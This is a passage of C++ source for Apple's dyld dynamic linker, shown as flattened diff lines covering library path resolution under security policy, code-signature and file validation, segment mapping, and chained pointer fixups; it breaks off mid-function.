if ( state.config.log.searching ) + state.log(" found: dylib-from-disk-to-override-cache: \"%s\"\n", possiblePath); + result = makeDiskLoader(possiblePathDiag, state, possiblePath, options, true, dylibInCacheIndex, nullptr); + if ( state.config.log.searching && possiblePathDiag.hasError() ) + state.log(" found: dylib-from-disk-to-override-cache-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + else { + // load from disk, nothing to do with dyld cache + if ( state.config.log.searching ) + state.log(" found: dylib-from-disk: \"%s\"\n", possiblePath); + result = makeDiskLoader(possiblePathDiag, state, possiblePath, options, false, 0, nullptr); + if ( state.config.log.searching && possiblePathDiag.hasError() ) + state.log(" found: dylib-from-disk-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + } + else if ( possiblePathIsInDyldCache ) { + // can use dylib in dyld cache + if ( state.config.log.searching ) + state.log(" found: dylib-from-cache: (0x%04X) \"%s\"\n", dylibInCacheIndex, possiblePath); + result = makeDyldCacheLoader(possiblePathDiag, state, possiblePath, options, dylibInCacheIndex, nullptr); + if ( state.config.log.searching && possiblePathDiag.hasError() ) + state.log(" found: dylib-from-cache-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + if ( result != nullptr ) { + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + } + else { + // set diag to be contain all errors from all paths tried + if ( diag.noError() ) + diag.error("tried: '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + else + diag.appendError(", '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + } + }); + + // The last possibility is that the path provided has ../ or // in it, + // or is a symlink to a dylib which is in the cache and no longer on disk. + // Use realpath() and try getLoader() again. + // Do this last and only if it would fail anyways so as to not slow down correct paths + if ( result == nullptr ) { + if ( !state.config.security.allowEnvVarsPath && loadPathIsFileRelativePath ) { + // don't realpath() relative paths in hardened programs + // but do check if path matches install name of something already loaded + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(loadPath) ) { + if ( state.config.log.searching ) + state.log(" found existing image by install name: \"%s\"\n", ldr->path()); + result = ldr; + diag.clearError(); + break; + } + } + } + else if ( !options.staticLinkage && (strchr(loadPath, '/') == nullptr) ) { + // don't realpath() leaf names to dlopen(), they have already been handled + } + else { + char canonicalPath[PATH_MAX]; + if ( (loadPath[0] != '@') && state.config.syscall.realpath(loadPath, canonicalPath) ) { + // only call getLoader() again if the realpath is different to prevent recursion + // don't call getLoader() again if the realpath is a just the loadPath cut back, because that means some dir was not found + if ( ::strncmp(loadPath, canonicalPath, strlen(canonicalPath)) != 0 ) { + if ( state.config.log.searching ) + state.log(" switch to realpath: \"%s\"\n", canonicalPath); + result = getLoader(diag, state, canonicalPath, options); + } + } + } + } + + if ( state.config.log.searching && (result == nullptr) ) + state.log(" not found: \"%s\"\n", loadPath); + + // if the load failed due to security policy, leave a hint in dlerror() or crash log messages + if ( (result == nullptr) && (loadPath[0] == '@') && !state.config.security.allowAtPaths ) { + diag.appendError(", (security policy does not allow @ path expansion)"); + } + + // if dylib could not be found, but is not required, clear error message + if ( result == nullptr ) { + if ( (options.canBeMissing || options.rtldNoLoad) ) + diag.clearError(); + else if ( diag.noError() ) { + bool isRPath = (strncmp(loadPath, "@rpath/", 7) == 0); + if ( isRPath ) { + __block bool hasRPath = false; + for ( const LoadChain* link = options.rpathStack; (link != nullptr) && !hasRPath; link = link->previous ) { + const MachOFile* mf = link->image->mf(state); + mf->forEachRPath(^(const char* rPath, bool& innerStop) { + hasRPath = true; + innerStop = true; + }); + } + if ( !hasRPath ) { + diag.error("no LC_RPATH's found"); + } else { + // FIXME: Is there an error we can give if we can even get here? + } + } else { + // FIXME: Is there an error we can give if we can even get here? + } + } + } + return result; +#endif // !TARGET_OS_EXCLAVEKIT +} + +#if !TARGET_OS_EXCLAVEKIT +bool Loader::expandAtLoaderPath(RuntimeState& state, const char* loadPath, const LoadOptions& options, const Loader* ldr, bool fromLCRPATH, char fixedPath[]) +{ + // only do something if path starts with @loader_path + if ( strncmp(loadPath, "@loader_path", 12) != 0 ) + return false; + if ( (loadPath[12] != '/') && (loadPath[12] != '\0') ) + return false; + + // don't support @loader_path in DYLD_INSERT_LIBRARIES + if ( options.insertedDylib ) { + if ( state.config.log.searching ) + state.log(" @loader_path not allowed in DYLD_INSERT_LIBRARIES\n"); + return false; + } + + // don't expand if security does not allow + if ( !state.config.security.allowAtPaths && fromLCRPATH && (ldr == state.mainExecutableLoader) ) { + // but allow @loader_path in LC_LOAD_DYLIB during dlopen() + if ( state.config.log.searching ) + state.log(" @loader_path in LC_RPATH from main executable not expanded due to security policy\n"); + return false; + } + + strlcpy(fixedPath, ldr->path(), PATH_MAX); + char* lastSlash = strrchr(fixedPath, '/'); + if ( lastSlash != nullptr ) { + strlcpy(lastSlash, &loadPath[12], PATH_MAX); + return true; + } + return false; +} + +bool Loader::expandAndNormalizeAtExecutablePath(const char* mainPath, const char* pathWithAtExecutable, char fixedPath[PATH_MAX]) +{ + // only do something if path starts with "@executable_path/" or is ""@executable_path" + if ( strncmp(pathWithAtExecutable, "@executable_path", 16) != 0 ) + return false; + if ( (pathWithAtExecutable[16] != '/') && (pathWithAtExecutable[16] != '\0') ) + return false; + + strlcpy(fixedPath, mainPath, PATH_MAX); + char* mainPathDirStart = strrchr(fixedPath, '/'); + if ( mainPathDirStart == nullptr ) + return false; // no slash in mainPath ?? + + const char* trailingLoadPath = &pathWithAtExecutable[16]; + if ( *trailingLoadPath == '/' ) { + // main executable path is already a real path, so we can remove ../ by chopping back path + // Ex: @executable_path/../Foo (when mainPath=/Applications/XZY.app/XZY) + // optimize /Applications/XZY.app/../Foo to /Applications/Foo + while ( strncmp(trailingLoadPath, "/..", 3) == 0 ) { + char* newLastSlash = mainPathDirStart-1; + while ( (newLastSlash > fixedPath) && (*newLastSlash != '/') ) + --newLastSlash; + if ( newLastSlash != fixedPath ) { + trailingLoadPath += 3; + mainPathDirStart = newLastSlash; + } else { + break; + } + } + } + else { + ++mainPathDirStart; + } + strlcpy(mainPathDirStart, trailingLoadPath, PATH_MAX); + return true; +} + +bool Loader::expandAtExecutablePath(RuntimeState& state, const char* loadPath, const LoadOptions& options, bool fromLCRPATH, char fixedPath[]) +{ + // only do something if path starts with @executable_path + if ( strncmp(loadPath, "@executable_path", 16) != 0 ) + return false; + if ( (loadPath[16] != '/') && (loadPath[16] != '\0') ) + return false; + + // don't expand if security does not allow + if ( !state.config.security.allowAtPaths ) { + if ( state.config.log.searching ) + state.log(" @executable_path not expanded due to security policy\n"); + return false; + } + + return expandAndNormalizeAtExecutablePath(state.config.process.mainExecutablePath, loadPath, fixedPath); +} + +void Loader::forEachResolvedAtPathVar(RuntimeState& state, const char* loadPath, const LoadOptions& options, ProcessConfig::PathOverrides::Type type, bool& stop, + void (^handler)(const char* possiblePath, ProcessConfig::PathOverrides::Type type, bool& stop)) +{ + // don't expand @rpath in DYLD_INSERT_LIBRARIES + bool isRPath = (strncmp(loadPath, "@rpath/", 7) == 0); + if ( isRPath && options.insertedDylib ) { + handler(loadPath, type, stop); + return; + } + + // expand @loader_path + BLOCK_ACCCESSIBLE_ARRAY(char, tempPath, PATH_MAX); + if ( expandAtLoaderPath(state, loadPath, options, options.rpathStack->image, false, tempPath) ) { + handler(tempPath, ProcessConfig::PathOverrides::Type::loaderPathExpansion, stop); +#if BUILDING_DYLD && TARGET_OS_OSX + if ( !stop ) { + // using @loader_path, but what it expanded to did not work ('stop' not set) + // maybe this is an old binary with an install name missing the /Versions/A/ part + const Loader* orgLoader = options.rpathStack->image; + const MachOAnalyzer* orgMA = orgLoader->analyzer(state); + if ( orgMA->isDylib() && !orgMA->enforceFormat(MachOAnalyzer::Malformed::loaderPathsAreReal) ) { + const char* fullPath = orgLoader->path(); + const char* installPath = orgMA->installName(); + if ( const char* installLeaf = strrchr(installPath, '/') ) { + size_t leafLen = strlen(installLeaf); + size_t fullLen = strlen(fullPath); + if ( fullLen > (leafLen+11) ) { + const char* fullWhereVersionMayBe = &fullPath[fullLen-leafLen-11]; + if ( strncmp(fullWhereVersionMayBe, "/Versions/", 10) == 0 ) { + // try expanding @loader_path to this framework's path that is missing /Versions/A part + strlcpy(tempPath, fullPath, PATH_MAX); + tempPath[fullLen-leafLen-11] = '\0'; + strlcat(tempPath, &loadPath[12], PATH_MAX); + handler(tempPath, ProcessConfig::PathOverrides::Type::loaderPathExpansion, stop); + } + } + } + } + } +#endif + return; + } + + // expand @executable_path + if ( expandAtExecutablePath(state, loadPath, options, false, tempPath) ) { + handler(tempPath, ProcessConfig::PathOverrides::Type::executablePathExpansion, stop); + return; + } + + // expand @rpath + if ( isRPath ) { + // note: rpathTail starts with '/' + const char* rpathTail = &loadPath[6]; + // keep track if this is an explict @rpath or implicit + ProcessConfig::PathOverrides::Type expandType = ProcessConfig::PathOverrides::Type::rpathExpansion; + if ( type == ProcessConfig::PathOverrides::Type::implictRpathExpansion ) + expandType = type; + // rpath is expansion is a stack of rpath dirs built starting with main executable and pushing + // LC_RPATHS from each dylib as they are recursively loaded. options.rpathStack is a linnked list of that stack. + for ( const LoadChain* link = options.rpathStack; (link != nullptr) && !stop; link = link->previous ) { + const MachOFile* mf = link->image->mf(state); + mf->forEachRPath(^(const char* rPath, bool& innerStop) { + if ( state.config.log.searching ) + state.log(" LC_RPATH '%s' from '%s'\n", rPath, link->image->path()); + if ( expandAtLoaderPath(state, rPath, options, link->image, true, tempPath) || expandAtExecutablePath(state, rPath, options, true, tempPath) ) { + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + } + else if ( rPath[0] == '/' ) { +#if BUILDING_DYLD && TARGET_OS_OSX && __arm64__ // FIXME: this should be a runtime check to enable unit testing + // if LC_RPATH is to absolute path like /usr/lib/swift, but this iOS app running on macOS, we really need /System/iOSSupport/usr/lib/swift + if ( state.config.process.platform == dyld3::Platform::iOS ) { + strlcpy(tempPath, "/System/iOSSupport", PATH_MAX); + strlcat(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + } + // fall through +#endif +#if TARGET_OS_SIMULATOR + // DYLD_ROOT_PATH should apply to LC_RPATH rpaths + if ( const char* simRoot = state.config.pathOverrides.simRootPath() ) { + strlcpy(tempPath, simRoot, PATH_MAX); + strlcat(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + } + // Even if DYLD_ROOT_PATH exists, LC_RPATH should add raw path to rpaths + // so fall through +#endif + + // LC_RPATH is an absolute path, not blocked by AtPath::none + strlcpy(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + + // Note this is after the above call due to: + // rdar://91027811 (dyld should search for dylib overrides in / before /System/Cryptexes/OS) + // DYLD_ROOT_PATH should apply to LC_RPATH rpaths + if ( const char* cryptexRoot = state.config.pathOverrides.cryptexRootPath() ) { + strlcpy(tempPath, cryptexRoot, PATH_MAX); + strlcat(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + } + } else { +#if BUILDING_DYLD && TARGET_OS_OSX // FIXME: this should be a runtime check to enable unit testing + // + // Relative paths. Only allow these if security supports them + if ( state.config.security.allowAtPaths ) { + strlcpy(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + } +#endif + } + if ( innerStop ) + stop = true; + }); + } + if ( stop ) + return; + } + + // only call with origin path if it did not start with @ + if ( loadPath[0] != '@' ) { + handler(loadPath, type, stop); + } +} +#endif // !TARGET_OS_EXCLAVEKIT + + +#if (BUILDING_DYLD || BUILDING_CLOSURE_UTIL || BUILDING_UNIT_TESTS) && !TARGET_OS_EXCLAVEKIT +uint64_t Loader::validateFile(Diagnostics& diag, const RuntimeState& state, int fd, const char* path, + const CodeSignatureInFile& codeSignature, const Loader::FileValidationInfo& fileValidation) +{ + // get file info + struct stat statBuf; + if ( state.config.syscall.fstat(fd, &statBuf) != 0 ) { + int statErr = errno; + if ( (statErr == EPERM) && state.config.syscall.sandboxBlockedStat(path) ) + diag.error("file system sandbox blocked stat(\"%s\")", path); + else if ( statErr == ENOENT ) + diag.error("no such file"); + else + diag.error("stat(\"%s\") failed with errno=%d", path, statErr); + return -1; + } + +#if !__LP64__ + statBuf.st_ino = (statBuf.st_ino & 0xFFFFFFFF); +#endif + + // if inode/mtime was recorded, check that + if ( fileValidation.checkInodeMtime ) { + if ( statBuf.st_ino != fileValidation.inode ) { + diag.error("file inode changed from 0x%llX to 0x%llX since PrebuiltLoader was built for '%s'", fileValidation.inode, statBuf.st_ino, path); + return -1; + } + if ( (uint64_t)statBuf.st_mtime != fileValidation.mtime ) { + diag.error("file mtime changed from 0x%llX to 0x%lX since PrebuiltLoader was built for '%s'", fileValidation.mtime, statBuf.st_mtime, path); + return -1; + } + // sanity check slice offset + if ( (uint64_t)statBuf.st_size < fileValidation.sliceOffset ) { + diag.error("file too small for slice offset '%s'", path); + return -1; + } + return fileValidation.sliceOffset; + } + else if ( codeSignature.size != 0 ) { +#if !TARGET_OS_SIMULATOR // some hashing functions not available in .a files + // otherwise compare cdHash + void* mappedFile = state.config.syscall.mmap(nullptr, (size_t)statBuf.st_size, PROT_READ, MAP_PRIVATE, fd, 0); + if ( mappedFile == MAP_FAILED ) { + diag.error("could not mmap() '%s'", path); + return -1; + } + uint64_t sliceOffset = -1; + bool isOSBinary = false; // FIXME + if ( const MachOFile* mf = MachOFile::compatibleSlice(diag, mappedFile, (size_t)statBuf.st_size, path, state.config.process.platform, isOSBinary, *state.config.process.archs, state.config.security.internalInstall) ) { + const MachOLoaded* ml = (MachOLoaded*)mf; + __block bool cdHashMatches = false; + // Note, file is not mapped with zero fill so cannot use forEachCdHash() + // need to use lower level forEachCDHashOfCodeSignature() which takes pointer to code blob + ml->forEachCDHashOfCodeSignature((uint8_t*)mf + codeSignature.fileOffset, codeSignature.size, ^(const uint8_t cdHash[20]) { + if ( ::memcmp((void*)cdHash, (void*)fileValidation.cdHash, 20) == 0 ) + cdHashMatches = true; + }); + if ( cdHashMatches ) + sliceOffset = (uint8_t*)mf - (uint8_t*)mappedFile; + else + diag.error("file cdHash not as expected '%s'", path); + } + state.config.syscall.munmap(mappedFile, (size_t)fileValidation.sliceOffset); + return sliceOffset; +#endif + } + return -1; +} + +#if BUILDING_DYLD +static bool getUuidFromFd(RuntimeState& state, int fd, uint64_t sliceOffset, char uuidStr[64]) +{ + strlcpy(uuidStr, "no uuid", 64); + mach_header mh; + if ( state.config.syscall.pread(fd, &mh, sizeof(mh), (size_t)sliceOffset) == sizeof(mh) ) { + if ( ((MachOFile*)&mh)->hasMachOMagic() ) { + size_t headerAndLoadCommandsSize = mh.sizeofcmds+sizeof(mach_header_64); + uint8_t buffer[headerAndLoadCommandsSize]; + if ( state.config.syscall.pread(fd, buffer, sizeof(buffer), (size_t)sliceOffset) == headerAndLoadCommandsSize ) { + uuid_t uuid; + if ( ((MachOFile*)buffer)->getUuid(uuid) ) { + Loader::uuidToStr(uuid, uuidStr); + return true; + } + } + } + } + return false; +} +#endif + +const MachOAnalyzer* Loader::mapSegments(Diagnostics& diag, RuntimeState& state, const char* path, uint64_t vmSpace, + const CodeSignatureInFile& codeSignature, bool hasCodeSignature, + const Array& regions, bool neverUnloads, bool prebuilt, const FileValidationInfo& fileValidation) +{ +#if BUILDING_DYLD + dyld3::ScopedTimer timer(DBG_DYLD_TIMING_MAP_IMAGE, path, 0, 0); +#endif + // open file + int fd = state.config.syscall.open(path, O_RDONLY, 0); + if ( fd == -1 ) { + int openErr = errno; + if ( (openErr == EPERM) && state.config.syscall.sandboxBlockedOpen(path) ) + diag.error("file system sandbox blocked open(\"%s\", O_RDONLY)", path); + else if ( openErr == ENOENT ) + diag.error("no such file"); + else + diag.error("open(\"%s\", O_RDONLY) failed with errno=%d", path, openErr); + return nullptr; + } + + // validated this file has not changed (since PrebuiltLoader was made) + uint64_t sliceOffset = fileValidation.sliceOffset; + if ( prebuilt ) { + sliceOffset = validateFile(diag, state, fd, path, codeSignature, fileValidation); + if ( diag.hasError() ) { + state.config.syscall.close(fd); + return nullptr; + } + } + +#if BUILDING_DYLD + // register code signature + uint64_t coveredCodeLength = UINT64_MAX; + if ( hasCodeSignature && codeSignature.size != 0 ) { + dyld3::ScopedTimer codeSigTimer(DBG_DYLD_TIMING_ATTACH_CODESIGNATURE, 0, 0, 0); + fsignatures_t siginfo; + siginfo.fs_file_start = sliceOffset; // start of mach-o slice in fat file + siginfo.fs_blob_start = (void*)(long)(codeSignature.fileOffset); // start of CD in mach-o file + siginfo.fs_blob_size = codeSignature.size; // size of CD + int result = state.config.syscall.fcntl(fd, F_ADDFILESIGS_RETURN, &siginfo); + if ( result == -1 ) { + char uuidStr[64]; + getUuidFromFd(state, fd, sliceOffset, uuidStr); + int errnoCopy = errno; + if ( (errnoCopy == EPERM) || (errnoCopy == EBADEXEC) ) { + diag.error("code signature invalid in <%s> '%s' (errno=%d) sliceOffset=0x%08llX, codeBlobOffset=0x%08X, codeBlobSize=0x%08X", + uuidStr, path, errnoCopy, sliceOffset, codeSignature.fileOffset, codeSignature.size); + } + else { + diag.error("fcntl(fd, F_ADDFILESIGS_RETURN) failed with errno=%d in <%s> '%s', sliceOffset=0x%08llX, codeBlobOffset=0x%08X, codeBlobSize=0x%08X", + errnoCopy, uuidStr, path, sliceOffset, codeSignature.fileOffset, codeSignature.size); + } + state.config.syscall.close(fd); + return nullptr; + } + coveredCodeLength = siginfo.fs_file_start; + if ( coveredCodeLength < codeSignature.fileOffset ) { + char uuidStr[64]; + getUuidFromFd(state, fd, sliceOffset, uuidStr); + diag.error("code signature does not cover entire file up to signature in <%s> '%s' (signed 0x%08llX, expected 0x%08X) for '%s'", + uuidStr, path, coveredCodeLength, codeSignature.fileOffset, path); + state.config.syscall.close(fd); + return nullptr; + } + } + + // dyld should use F_CHECK_LV even on unsigned binaries + { + // always call F_CHECK_LV to preflight + fchecklv checkInfo; + char messageBuffer[512]; + messageBuffer[0] = '\0'; + checkInfo.lv_file_start = sliceOffset; + checkInfo.lv_error_message_size = sizeof(messageBuffer); + checkInfo.lv_error_message = messageBuffer; + int res = state.config.syscall.fcntl(fd, F_CHECK_LV, &checkInfo); + if ( res == -1 ) { + // rdar://79796526 (include uuid of mis-signed binary to help debug) + char uuidStr[64]; + getUuidFromFd(state, fd, sliceOffset, uuidStr); + diag.error("code signature in <%s> '%s' not valid for use in process: %s", uuidStr, path, messageBuffer); + state.config.syscall.close(fd); + return nullptr; + } + } +#endif + +#if BUILDING_DYLD && SUPPORT_ROSETTA + // if translated, need to add in translated code segment + char aotPath[PATH_MAX]; + uint64_t extraAllocSize = 0; + if ( state.config.process.isTranslated ) { + int ret = aot_get_extra_mapping_info(fd, path, extraAllocSize, aotPath, sizeof(aotPath)); + if ( ret == 0 ) { + vmSpace += extraAllocSize; + } + else { + extraAllocSize = 0; + aotPath[0] = '\0'; + } + } +#endif + + // reserve address range + vm_address_t loadAddress = 0; + kern_return_t r = ::vm_allocate(mach_task_self(), &loadAddress, (vm_size_t)vmSpace, VM_FLAGS_ANYWHERE); + if ( r != KERN_SUCCESS ) { + diag.error("vm_allocate(size=0x%0llX) failed with result=%d", vmSpace, r); + state.config.syscall.close(fd); + return nullptr; + } + +#if BUILDING_DYLD + if ( state.config.log.segments ) { + if ( sliceOffset != 0 ) + state.log("Mapping %s (slice offset=0x%llX)\n", path, sliceOffset); + else + state.log("Mapping %s\n", path); + } +#endif + + // map each segment + bool mmapFailure = false; + const bool enableTpro = state.config.process.enableTproDataConst; + __block uint32_t segIndex = 0; + for ( const Region& region : regions ) { + // Mapping zero filled regions fails with mmap of size 0 + if ( region.isZeroFill || (region.fileSize == 0) ) + continue; + if ( (region.vmOffset == 0) && (segIndex > 0) ) + continue; + int perms = VM_PROT_READ; + int flags = MAP_FIXED | MAP_PRIVATE; + +#if BUILDING_DYLD + perms = region.perms; +#endif + if (enableTpro && region.readOnlyData) { + flags |= MAP_TPRO; + } + void* segAddress = state.config.syscall.mmap((void*)(loadAddress + region.vmOffset), (size_t)region.fileSize, perms, + flags, fd, (size_t)(sliceOffset + region.fileOffset)); + int mmapErr = errno; + if ( segAddress == MAP_FAILED ) { + if ( mmapErr == EPERM ) { + if ( state.config.syscall.sandboxBlockedMmap(path) ) + diag.error("file system sandbox blocked mmap() of '%s'", path); + else + diag.error("code signing blocked mmap() of '%s'", path); + } + else { + diag.error("mmap(addr=0x%0llX, size=0x%08X) failed with errno=%d for %s", loadAddress + region.vmOffset, + region.fileSize, mmapErr, path); + } + mmapFailure = true; + break; + } + + // sanity check first segment is mach-o header + if ( !mmapFailure && (segIndex == 0) ) { + const MachOAnalyzer* ma = (MachOAnalyzer*)segAddress; + if ( !ma->isMachO(diag, region.fileSize) ) { + mmapFailure = true; + break; + } + } + if ( !mmapFailure ) { +#if BUILDING_DYLD + uintptr_t mappedSize = round_page((uintptr_t)region.fileSize); + uintptr_t mappedStart = (uintptr_t)segAddress; + uintptr_t mappedEnd = mappedStart + mappedSize; + if ( state.config.log.segments ) { + const MachOLoaded* lmo = (MachOLoaded*)loadAddress; + state.log("%14s (%c%c%c) 0x%012lX->0x%012lX\n", lmo->segmentName(segIndex), + (region.perms & PROT_READ) ? 'r' : '.', (region.perms & PROT_WRITE) ? 'w' : '.', (region.perms & PROT_EXEC) ? 'x' : '.', + mappedStart, mappedEnd); + } +#endif + } + ++segIndex; + } + +#if BUILDING_DYLD && !TARGET_OS_SIMULATOR && (__arm64__ || __arm__) + if ( !mmapFailure ) { + // tell kernel about fairplay encrypted regions + uint32_t fpTextOffset; + uint32_t fpSize; + const MachOAnalyzer* ma = (const MachOAnalyzer*)loadAddress; + // FIXME: record if FP info in PrebuiltLoader + if ( ma->isFairPlayEncrypted(fpTextOffset, fpSize) ) { + int result = state.config.syscall.mremap_encrypted((void*)(loadAddress + fpTextOffset), fpSize, 1, ma->cputype, ma->cpusubtype); + if ( result != 0 ) { + diag.error("could not register fairplay decryption, mremap_encrypted() => %d", result); + mmapFailure = true; + } + } + } +#endif + + if ( mmapFailure ) { + ::vm_deallocate(mach_task_self(), loadAddress, (vm_size_t)vmSpace); + state.config.syscall.close(fd); + return nullptr; + } + +#if BUILDING_DYLD && SUPPORT_ROSETTA + if ( state.config.process.isTranslated && (extraAllocSize != 0) ) { + // map in translated code at end of mapped segments + dyld_aot_image_info aotInfo; + uint64_t extraSpaceAddr = (long)loadAddress + vmSpace - extraAllocSize; + int ret = aot_map_extra(path, (mach_header*)loadAddress, (void*)extraSpaceAddr, aotInfo.aotLoadAddress, aotInfo.aotImageSize, aotInfo.aotImageKey); + if ( ret == 0 ) { + // fill in the load address, at this point the Rosetta trap has filled in the other fields + aotInfo.x86LoadAddress = (mach_header*)loadAddress; + #if HAS_EXTERNAL_STATE + std::span aots(&aotInfo, 1); + // dyld automatically adds an entry to the image list when loading the dylib. + // Add an entry for the aot info but pass an empty std::span for the dyld image info + std::span infos; + state.externallyViewable.addRosettaImages(aots, infos); + #endif + if ( state.config.log.segments ) { + state.log("%14s (r.x) 0x%012llX->0x%012llX\n", "ROSETTA", extraSpaceAddr, extraSpaceAddr + extraAllocSize); + } + } + } +#endif + // close file + state.config.syscall.close(fd); + return (MachOAnalyzer*)loadAddress; +} +#endif // BUILDING_DYLD || BUILDING_CLOSURE_UTIL || BUILDING_UNIT_TESTS + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS + +// can't do page-in linking with simulator until will know host OS will support it +#if !TARGET_OS_SIMULATOR && !TARGET_OS_EXCLAVEKIT + +static void fixupPage64(void* pageContent, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, uint32_t pageIndex, bool offsetBased) +{ + const uint64_t* bindsArray = (uint64_t*)((uint8_t*)blob + blob->mwli_binds_offset); + uint16_t firstStartOffset = segInfo->page_start[pageIndex]; + // check marker for no fixups on the page + if ( firstStartOffset == DYLD_CHAINED_PTR_START_NONE ) + return; + uint64_t* chain = (uint64_t*)((uint8_t*)pageContent + firstStartOffset); + // walk chain + const uint64_t targetAdjust = (offsetBased ? blob->mwli_image_address : blob->mwli_slide); + uint64_t delta = 0; + do { + uint64_t value = *chain; + bool isBind = (value & 0x8000000000000000ULL); + delta = (value >> 51) & 0xFFF; + //fprintf(stderr, " offset=0x%08lX, chain=%p, value=0x%016llX, delta=%lld\n", (long)chain - (long)header, chain, value, delta); + if ( isBind ) { + // is bind + uint32_t bindOrdinal = value & 0x00FFFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } + else { + uint32_t addend = (value >> 24) & 0xFF; + *chain = bindsArray[bindOrdinal] + addend; + } + } + else { + // is rebase + uint64_t target = value & 0xFFFFFFFFFULL; + uint64_t high8 = (value >> 36) & 0xFF; + *chain = target + targetAdjust + (high8 << 56); + } + chain = (uint64_t*)((uint8_t*)chain + (delta*4)); // 4-byte stride + } while ( delta != 0 ); +} + + +static void fixupChain32(uint32_t* chain, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, const uint32_t bindsArray[]) +{ + //fprintf(stderr, "fixupChain32(%p)\n", chain); + uint32_t delta = 0; + do { + uint32_t value = *chain; + delta = (value >> 26) & 0x1F; + //fprintf(stderr, " chain=%p, value=0x%08X, delta=%u\n", chain, value, delta); + if ( value & 0x80000000 ) { + // is bind + uint32_t bindOrdinal = value & 0x000FFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } + else { + uint32_t addend = (value >> 20) & 0x3F; + *chain = bindsArray[bindOrdinal] + addend; + } + } + else { + // is rebase + uint32_t target = value & 0x03FFFFFF; + if ( target > segInfo->max_valid_pointer ) { + // handle non-pointers in chain + uint32_t bias = (0x04000000 + segInfo->max_valid_pointer)/2; + *chain = target - bias; + } + else { + *chain = target + (uint32_t)blob->mwli_slide; + } + } + chain += delta; + } while ( delta != 0 ); +} + + +static void fixupPage32(void* pageContent, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, uint32_t pageIndex) +{ + const uint32_t* bindsArray = (uint32_t*)((uint8_t*)blob + blob->mwli_binds_offset); + uint16_t startOffset = segInfo->page_start[pageIndex]; + if ( startOffset == DYLD_CHAINED_PTR_START_NONE ) + return; + if ( startOffset & DYLD_CHAINED_PTR_START_MULTI ) { + // some fixups in the page are too far apart, so page has multiple starts + uint32_t overflowIndex = startOffset & ~DYLD_CHAINED_PTR_START_MULTI; + bool chainEnd = false; + while ( !chainEnd ) { + chainEnd = (segInfo->page_start[overflowIndex] & DYLD_CHAINED_PTR_START_LAST); + startOffset = (segInfo->page_start[overflowIndex] & ~DYLD_CHAINED_PTR_START_LAST); + uint32_t* chain = (uint32_t*)((uint8_t*)pageContent + startOffset); + fixupChain32(chain, blob, segInfo, bindsArray); + ++overflowIndex; + } + } + else { + uint32_t* chain = (uint32_t*)((uint8_t*)pageContent + startOffset); + fixupChain32(chain, blob, segInfo, bindsArray); + } + } + +#if __has_feature(ptrauth_calls) +static uint64_t signPointer(uint64_t unsignedAddr, void* loc, bool addrDiv, uint16_t diversity, ptrauth_key key) +{ + // don't sign NULL + if ( unsignedAddr == 0 ) + return 0; + + uint64_t extendedDiscriminator = diversity; + if ( addrDiv ) + extendedDiscriminator = __builtin_ptrauth_blend_discriminator(loc, extendedDiscriminator); + switch ( key ) { + case ptrauth_key_asia: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 0, extendedDiscriminator); + case ptrauth_key_asib: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 1, extendedDiscriminator); + case ptrauth_key_asda: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 2, extendedDiscriminator); + case ptrauth_key_asdb: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 3, extendedDiscriminator); + default: + assert(0 && "invalid signing key"); + } +} + +static void fixupPageAuth64(void* pageContent, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, uint32_t pageIndex, bool offsetBased) +{ + //fprintf(stderr, "fixupPageAuth64(): pageContent=%p, blob=%p, segInfo=%p, pageIndex=%u\n", pageContent, blob, segInfo, pageIndex); + const uint64_t* bindsArray = (uint64_t*)((uint8_t*)blob + blob->mwli_binds_offset); + uint16_t firstStartOffset = segInfo->page_start[pageIndex]; + // check marker for no fixups on the page + if ( firstStartOffset == DYLD_CHAINED_PTR_START_NONE ) + return; + uint64_t* chain = (uint64_t*)((uint8_t*)pageContent + firstStartOffset); + // walk chain + const uint64_t targetAdjust = (offsetBased ? blob->mwli_image_address : blob->mwli_slide); + uint64_t delta = 0; + do { + uint64_t value = *chain; + delta = (value >> 51) & 0x7FF; + //fprintf(stderr, " chain=%p, value=0x%08llX, delta=%llu\n", chain, value, delta); + bool isAuth = (value & 0x8000000000000000ULL); + bool isBind = (value & 0x4000000000000000ULL); + if ( isAuth ) { + ptrauth_key key = (ptrauth_key)((value >> 49) & 0x3); + bool addrDiv = ((value & (1ULL << 